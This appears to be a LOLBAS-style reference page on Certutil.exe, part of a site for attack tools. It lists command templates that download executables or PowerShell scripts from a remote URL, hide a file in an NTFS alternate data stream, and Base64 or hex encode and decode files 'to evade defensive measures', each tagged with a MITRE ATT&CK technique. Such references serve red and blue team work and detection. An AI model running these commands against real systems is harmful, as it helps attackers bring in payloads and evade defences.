🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Certutil.exe

Certutil.exe

Windows binary used for handling certificates

ADS

Download file from Internet and save it in an NTFS Alternate Data Stream

certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt

Download and save a .ps1 file to an Alternate Data Stream (ADS). — MITRE: T1564.004 — Privileges: User

Decode

Decode files to evade defensive measures

certutil -decode {PATH:.base64} {PATH}

Command to decode a Base64 encoded file. — MITRE: T1140 — Privileges: User

Decode files to evade defensive measures

certutil -decodehex {PATH:.hex} {PATH}

Command to decode a hexadecimal-encoded file. — MITRE: T1140 — Privileges: User

Download

Download file from Internet

certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe}

Download and save an executable to disk in the current folder. — MITRE: T1105 — Privileges: User

Download file from Internet

certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}

Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>` when not. — MITRE: T1105 — Privileges: User

Download file from Internet

certutil.exe -URL {REMOTEURL:.exe}

Download and save an executable to `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>`. — MITRE: T1105 — Privileges: User

Encode

Encode files to evade defensive measures

certutil -encode {PATH} {PATH:.base64}

Command to encode a file using Base64 — MITRE: T1027.013 — Privileges: User